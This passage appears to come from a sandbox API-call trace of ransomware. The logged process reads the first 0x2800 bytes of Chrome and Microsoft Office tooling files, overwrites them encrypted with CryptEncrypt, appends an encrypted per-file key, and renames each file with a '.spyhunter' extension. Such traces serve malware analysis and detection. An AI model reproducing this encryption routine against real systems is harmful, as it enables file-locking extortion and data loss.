(x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json.spyhunter")) returned 1 [0176.850] GetProcessHeap () returned 0x2c0000 [0176.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.850] GetProcessHeap () returned 0x2c0000 [0176.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.850] GetProcessHeap () returned 0x2c0000 [0176.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8128 | out: hHeap=0x2c0000) returned 1 [0176.850] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e428 | out: pbBuffer=0x248e428) returned 1 [0176.850] GetProcessHeap () returned 0x2c0000 [0176.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.850] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e420*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e420*=0x30) returned 1 [0176.850] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.851] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx") returned 91 [0176.851] StrStrW (lpFirst="youtube.crx", lpSrch=".txt") returned 0x0 [0176.852] GetProcessHeap () returned 0x2c0000 [0176.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.852] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e3e4*=0x2800, lpOverlapped=0x0) returned 1 [0177.033] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.033] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e3e4*=0x2800, lpOverlapped=0x0) returned 1 [0177.033] GetProcessHeap () returned 0x2c0000 [0177.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0177.034] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.034] WriteFile (in: hFile=0x9c, lpBuffer=0x248e424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x248e424*, lpNumberOfBytesWritten=0x248e3e4*=0x4, lpOverlapped=0x0) returned 1 [0177.108] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3e4*=0x30, lpOverlapped=0x0) returned 1 [0177.108] CloseHandle (hObject=0x9c) returned 1 [0177.108] GetProcessHeap () returned 0x2c0000 [0177.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.108] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx.spyhunter") returned 101 [0177.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx.spyhunter")) returned 1 [0177.113] GetProcessHeap () returned 0x2c0000 [0177.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.113] GetProcessHeap () returned 0x2c0000 [0177.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.114] GetProcessHeap () returned 0x2c0000 [0177.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e5c0 | out: hHeap=0x2c0000) returned 1 [0177.114] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e420 | out: pbBuffer=0x248e420) returned 1 [0177.114] GetProcessHeap () returned 0x2c0000 [0177.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.114] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e418*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e418*=0x30) returned 1 [0177.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_elf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.115] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll") returned 81 [0177.115] StrStrW (lpFirst="chrome_elf.dll", lpSrch=".txt") returned 0x0 [0177.115] GetProcessHeap () returned 0x2c0000 [0177.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.115] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.274] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.275] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.275] GetProcessHeap () returned 0x2c0000 [0177.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.275] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.275] WriteFile (in: hFile=0x178, lpBuffer=0x248e41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x248e41c*, lpNumberOfBytesWritten=0x248e3dc*=0x4, lpOverlapped=0x0) returned 1 [0177.321] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3dc*=0x30, lpOverlapped=0x0) returned 1 [0177.321] CloseHandle (hObject=0x178) returned 1 [0177.321] GetProcessHeap () returned 0x2c0000 [0177.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.321] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll.spyhunter") returned 91 [0177.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_elf.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_elf.dll.spyhunter")) returned 1 [0177.323] GetProcessHeap () returned 0x2c0000 [0177.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.324] GetProcessHeap () returned 0x2c0000 [0177.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.324] GetProcessHeap () returned 0x2c0000 [0177.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9f10 | out: hHeap=0x2c0000) returned 1 [0177.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e420 | out: pbBuffer=0x248e420) returned 1 [0177.324] GetProcessHeap () returned 0x2c0000 [0177.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e418*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e418*=0x30) returned 1 [0177.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.331] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak") returned 89 [0177.331] StrStrW (lpFirst="chrome_100_percent.pak", lpSrch=".txt") returned 0x0 [0177.331] GetProcessHeap () returned 0x2c0000 [0177.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.331] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e3dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.400] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e3dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.401] GetProcessHeap () returned 0x2c0000 [0177.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.401] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.401] WriteFile (in: hFile=0x178, lpBuffer=0x248e41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x248e41c*, lpNumberOfBytesWritten=0x248e3dc*=0x4, lpOverlapped=0x0) returned 1 [0177.433] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3dc*=0x30, lpOverlapped=0x0) returned 1 [0177.433] CloseHandle (hObject=0x178) returned 1 [0177.571] GetProcessHeap () returned 0x2c0000 [0177.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.572] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak.spyhunter") returned 99 [0177.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak.spyhunter")) returned 1 [0177.574] GetProcessHeap () returned 0x2c0000 [0177.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.575] GetProcessHeap () returned 0x2c0000 [0177.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.575] GetProcessHeap () returned 0x2c0000 [0177.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e0c0 | out: hHeap=0x2c0000) returned 1 [0177.575] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e418 | out: pbBuffer=0x248e418) returned 1 [0177.575] GetProcessHeap () returned 0x2c0000 [0177.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.575] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e410*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e410*=0x30) returned 1 [0177.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.577] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 72 [0177.578] StrStrW (lpFirst="vstoee.dll", lpSrch=".txt") returned 0x0 [0177.578] GetProcessHeap () returned 0x2c0000 [0177.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.578] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e3d4*=0x2800, lpOverlapped=0x0) returned 1 [0177.697] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.697] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e3d4*=0x2800, lpOverlapped=0x0) returned 1 [0177.697] GetProcessHeap () returned 0x2c0000 [0177.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.697] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.697] WriteFile (in: hFile=0x9c, lpBuffer=0x248e414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x248e414*, lpNumberOfBytesWritten=0x248e3d4*=0x4, lpOverlapped=0x0) returned 1 [0177.712] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3d4*=0x30, lpOverlapped=0x0) returned 1 [0177.712] CloseHandle (hObject=0x9c) returned 1 [0177.712] GetProcessHeap () returned 0x2c0000 [0177.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.712] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.spyhunter") returned 82 [0177.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll.spyhunter")) returned 1 [0177.714] GetProcessHeap () returned 0x2c0000 [0177.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.714] GetProcessHeap () returned 0x2c0000 [0177.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.714] GetProcessHeap () returned 0x2c0000 [0177.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4390 | out: hHeap=0x2c0000) returned 1 [0177.715] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e418 | out: pbBuffer=0x248e418) returned 1 [0177.715] GetProcessHeap () returned 0x2c0000 [0177.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.715] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e410*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e410*=0x30) returned 1 [0177.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.716] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config") returned 87 [0177.716] StrStrW (lpFirst="VSTOInstaller.config", lpSrch=".txt") returned 0x0 [0177.716] GetProcessHeap () returned 0x2c0000 [0177.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.716] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e3d4*=0x2cc, lpOverlapped=0x0) returned 1 [0177.750] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.751] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e3d4*=0x2cc, lpOverlapped=0x0) returned 1 [0177.751] GetProcessHeap () returned 0x2c0000 [0177.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.751] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.751] WriteFile (in: hFile=0x9c, lpBuffer=0x248e414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x248e414*, lpNumberOfBytesWritten=0x248e3d4*=0x4, lpOverlapped=0x0) returned 1 [0177.751] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3d4*=0x30, lpOverlapped=0x0) returned 1 [0177.751] CloseHandle (hObject=0x9c) returned 1 [0177.751] GetProcessHeap () returned 0x2c0000 [0177.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.751] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.spyhunter") returned 97 [0177.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.spyhunter")) returned 1 [0177.752] GetProcessHeap () returned 0x2c0000 [0177.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.752] GetProcessHeap () returned 0x2c0000 [0177.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.752] GetProcessHeap () returned 0x2c0000 [0177.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c540 | out: hHeap=0x2c0000) returned 1 [0177.752] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e410 | out: pbBuffer=0x248e410) returned 1 [0177.752] GetProcessHeap () returned 0x2c0000 [0177.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.752] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e408*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e408*=0x30) returned 1 [0177.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.hostadapter.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.753] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll") returned 151 [0177.753] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll", lpSrch=".txt") returned 0x0 [0177.753] GetProcessHeap () returned 0x2c0000 [0177.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.753] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0177.756] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.756] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0177.756] GetProcessHeap () returned 0x2c0000 [0177.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.756] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.757] WriteFile (in: hFile=0x9c, lpBuffer=0x248e40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x248e40c*, lpNumberOfBytesWritten=0x248e3cc*=0x4, lpOverlapped=0x0) returned 1 [0177.757] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3cc*=0x30, lpOverlapped=0x0) returned 1 [0177.757] CloseHandle (hObject=0x9c) returned 1 [0177.758] GetProcessHeap () returned 0x2c0000 [0177.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.758] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll.spyhunter") returned 161 [0177.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.hostadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.hostadapter.v10.0.dll.spyhunter")) returned 1 [0177.759] GetProcessHeap () returned 0x2c0000 [0177.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.759] GetProcessHeap () returned 0x2c0000 [0177.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.759] 